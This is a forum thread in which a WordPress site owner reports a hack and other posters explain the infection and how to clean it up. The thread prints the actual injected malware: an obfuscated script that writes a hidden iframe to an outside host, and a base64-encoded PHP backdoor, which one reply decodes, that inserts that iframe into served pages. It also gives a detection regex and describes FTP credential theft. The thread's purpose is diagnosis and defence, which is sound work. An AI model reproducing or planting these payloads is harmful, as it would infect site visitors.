Thread: my wordpress blog been hacked

oh man this sucks so bad!

check the bottom of your source code if it has this ur infected too.

<script language="javascript">eval(unescape("%64%6F%63%75% 6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61 %6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%6 9%62%7A%6F%70%6C%2E%63%6F%6D%2F%69%6E%2E%70%68%70% 22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D %31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3 C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>

i have no idea how to clean it up, guess ill give godaddy a call tomorrow but i hope all my visitors dont think im trying to hack them. ahh

What does it do to your blog? Do you have any idea how it happened?

The virus is on a PC with FTP access to your website. The virus steals FTP login credentials, sends them to a server which connects to the website with valid credentials, downloads either all of the files or only a select few, infects them then uploads them to the server.

For Wordpress blogs you should also scan all .php files for a string that looks like:

PHP Code:

<?php eval(base64_decode(...

and then a long list of characters. Typically when the hackers obtain access to a website, they put this code in some .php files. This gives them remote access to your website - yes, they can then re-infect the website without ever logging back in.

If you have all of the files saved on your PC, you can check them for infectious code but also please check all the files on your server. Sometimes they'll inject the above code I showed into existing .php files and sometimes they'll also create bogus files with nothing but their malscript in it.

Quite often these stand alone files are in an images folder and sometimes they're named gifimg.php. Look in all images folders but also check all .php files as they do inject it either at the very top or the very bottom of a file.

As far as the virus goes, it knows how to evade detection of the currently installed anti-virus program. So you may have to install something different. I've had good success recommending Avast, F-Prot or Kaspersky. However, remember, the virus knows how to evade detection of the currently installed anti-virus so if you already have one of these installed, you'll have to install one of the other ones. Kaspersky doesn't like other anti-virus programs installed so you may have to uninstall your current anti-virus program if you're going to use Kasperksy.

The virus works because quite possibly you're using an FTP program that stores the username and password combinations in a plain text file. This is quite common with the free versions. The following all store the login credentials in a plain text (unencrypted) format:

1.CoffeeCup Direct FTP
2.TransSoft FTP Control 4
3.Core FTP
4.GlobalScape CuteFTP
5.Far Manager (with FTP plugin)
6.FileZilla
7.FlashFXP
8.SmartFTP
9.FTP Navigator
10.Total Commander

I use WS_FTP by Ipswitch because it encrypts the login credentials so they can't be stolen - so easily.

Post back here if you have further questions or updates - please.

I dont use Wordpress, but I was wondering im my site is safe. I use Dreamweaver, but dont use the built in FTP. I use the FTP in cPanel and log in each time I need to upload files. Is there only a threat if your information is stored in a text file or would I be at risk?

You're not susceptible to that method of stealing passwords, however the virus in many other ways.

First, it looks to steal the passwords from plain text files, if that doesn't work some of the variants will also act as a keyboard logger. So as you type your credentials in, it steals them.

It also acts as a sniffer. FTP transmits all data in plain text including the usernames and passwords. So it's easy for the virus to see and steal that information as well.

Last, we've seen where the virus will inject the malscript into the data stream as it's leaving the PC. The files on the PC are clean. By the time the files get to the website, they're infected. These guys might be crooks, but they're geniuses as well.

Bottom line, scan your PCs for viruses - constantly.

hmm...I have used filezilla occasionally . Most times I go through my host.

Originally Posted by WeWatch

The virus is on a PC with FTP access to your website. The virus steals FTP login credentials, sends them to a server which connects to the website with valid credentials, downloads either all of the files or only a select few, infects them then uploads them to the server.

For Wordpress blogs you should also scan all .php files for a string that looks like:

PHP Code:

<?php eval(base64_decode(...

and then a long list of characters. Typically when the hackers obtain access to a website, they put this code in some .php files. This gives them remote access to your website - yes, they can then re-infect the website without ever logging back in.

If you have all of the files saved on your PC, you can check them for infectious code but also please check all the files on your server. Sometimes they'll inject the above code I showed into existing .php files and sometimes they'll also create bogus files with nothing but their malscript in it.

Quite often these stand alone files are in an images folder and sometimes they're named gifimg.php. Look in all images folders but also check all .php files as they do inject it either at the very top or the very bottom of a file.

As far as the virus goes, it knows how to evade detection of the currently installed anti-virus program. So you may have to install something different. I've had good success recommending Avast, F-Prot or Kaspersky. However, remember, the virus knows how to evade detection of the currently installed anti-virus so if you already have one of these installed, you'll have to install one of the other ones. Kaspersky doesn't like other anti-virus programs installed so you may have to uninstall your current anti-virus program if you're going to use Kasperksy.

The virus works because quite possibly you're using an FTP program that stores the username and password combinations in a plain text file. This is quite common with the free versions. The following all store the login credentials in a plain text (unencrypted) format:

1.CoffeeCup Direct FTP
2.TransSoft FTP Control 4
3.Core FTP
4.GlobalScape CuteFTP
5.Far Manager (with FTP plugin)
6.FileZilla
7.FlashFXP
8.SmartFTP
9.FTP Navigator
10.Total Commander

I use WS_FTP by Ipswitch because it encrypts the login credentials so they can't be stolen - so easily.

Post back here if you have further questions or updates - please.

wow thanks for all the info, yes it puts all this encrypted code into all the php files

i was using filezilla. ive tried to go threw all of the php files and remove their code but it doesnt seem to work. im giong to just delete everything from the FTP and reinstall wordpress

hopefully that works

You can use grepWin. It will find and delete all the .php malscripts with the base64_decode in it.

grepWin is free. And if you already have the files on your PC, you can use it quite nicely.

The regex string you'd use for the base64_decode string is:

<\?php\s*eval\(base64_decode\([\'|\"].*?[\'|\"].*?\)\);\s*\?>

Then set your Search in box to the folder where your files are saved. Select Regex search, use the string above in the Search for: box.

Then set these options:

uncheck Search case-sensitive
check Dot match newline
check Create backup files
uncheck Treat files as UTF8
select All sizes
check Include system items
check Include hidden items
check Include subfolders

Then select Search first to see the list of files in the Search results window. You can right-click on any one of them and open them in Wordpad to verify that the code is in that file.

Then click on Replace. Since we didn't enter anything into the Replace with: box, it will simply remove that string.

I've cleaned a lot of websites this way. I know it works.

Or, if you just don't trust it, make sure you delete your entire website, after doing a full back-up. Don't just overwrite files on your site because you'll never know if you got all the backdoors or not.

Let me know if you have questions or which way you decided to go.

And I would get rid of FileZilla as well.

first thanks a lot for your help.

i have tried grepWin and it does not catch anything. 0 matches.

last night i went threw all of the php files and tried to clean them. however, im not 100% sure i got them all. i think i have since my site is acting normal now and i can see the wordpress backend as i did before. the only thing that is wrong now is that the same html code is still at the bottom of my page source!

do you know how to get rid of it?

and would u suggest a clean reinstall? or are there any other options left?

THANK YOU again

I would suggest a clean re-install. I can clean it but I need FTP access which is something not everyone is willing to provide.

Something is generating that code so it might be some footer.php file or some file that is included toward the end in your template file.

Don't forget the anti-virus information. Otherwise, you could be doing this all over again.

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl 9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsg ICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl 9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9l eGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgIC AgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FH RU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVk VSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAg ICByZXR1cm4gJzxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcH QiPmV2YWwodW5lc2NhcGUoIiU2NCU2RiU2MyU3NSU2RCU2NSU2 RSU3NCUyRSU3NyU3MiU2OSU3NCU2NSUyOCUyNyUzQyU2OSU2Ni U3MiU2MSU2RCU2NSUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3 NCU3MCUzQSUyRiUyRiU2MiU2OSU2MiU3QSU2RiU3MCU2QyUyRS U2MyU2RiU2RCUyRiU2OSU2RSUyRSU3MCU2OCU3MCUyMiUyMCU3 NyU2OSU2NCU3NCU2OCUzRCUzMSUyMCU2OCU2NSU2OSU2NyU2OC U3NCUzRCUzMSUyMCU2NiU3MiU2MSU2RCU2NSU2MiU2RiU3MiU2 NCU2NSU3MiUzRCUzMCUzRSUzQyUyRiU2OSU2NiU3MiU2MSU2RC U2NSUzRSUyNyUyOSUzQiIpKTwvc2NyaXB0Pic7ICAgICAgfSAg ICAgIHJldHVybiAiIjsgICAgIH0gICAgfSAgICAgICAgaWYoIW Z1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ICAgICBmdW5j dGlvbiBnemRlY29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4Rj YxMUE1NjQ2ODRDKXsgICAgICAkUjMwQjJBQjhEQzE0OTZEMDZC MjMwQTcxRDg5NjJBRjVEPUBvcmQoQHN1YnN0cigkUjVBOUNGMU I0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDMsMSkpOyAgICAg ICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9MT A7ICAgICAgJFJBM0Q1MkU1MkE0ODkzNkNERTBGNTM1NkJCMDg2 NTJGMj0wOyAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMz BBNzFEODk2MkFGNUQmNCl7ICAgICAgICRSNjNCRURFNkIxOTI2 NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3 RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMs MTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMD dBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0 RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNk Y2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRF RkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzME IyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAg ICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT 1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2 NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMj g4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFC OERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgIC AkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBz dHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Nj g0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1 QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4RE MxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJC RTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgIC AgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgy MkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCND k3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5 MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMz RBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNF KXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMk RBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2 ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rj k5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBm dW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NE VCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNv ZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMz Y5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFG NzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ1 9tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUy OEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZW dfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21s KCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3Qj U5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRS QTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKC k7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAg fSAgfQ=="));?>

the code showing up in my php files

Which decodes to:

if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){
$GLOBALS['mr_no']=1;
if(!function_exists('mrobh')){
if(!function_exists('gml')){
function gml(){
if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){
return '<script language="javascript">eval(unescape("&#37;64%6F%63 %75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%7 2%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F% 62%69%62%7A%6F%70%6C%2E%63%6F%6D%2F%69%6E%2E%70%68 %70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%7 4%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30% 3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>';
}
return "";
}
}
if(!function_exists('gzdecode')){
function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){
$R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R 5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',sub str($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266 D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19 266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF 1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939 226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF 1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939 226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@sub str($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037 E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502 ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82E E9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B 81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } }

Which if you look at the stuff in the script tags, is what you're seeing.

hmm, i have ESET on my computer but i think i have a virus on it. every time i download wordpress and extract it its already hacked.

it comes with index files with the code below in them.

<?php
// Silence is golden.
?>

im doing a clean reinstall now, hopefully that will finally work.

UPDATE: after 2 hours of uninstalling wordpress, reinstalling, importing all of the posts back, uploading the pictures and video back....after all that its still hacked.......

i see no solution

If that's your concern, know that those files are legitimate.

I don't claim to be a Wordpress expert, but those Silence is golden lines are legitimate.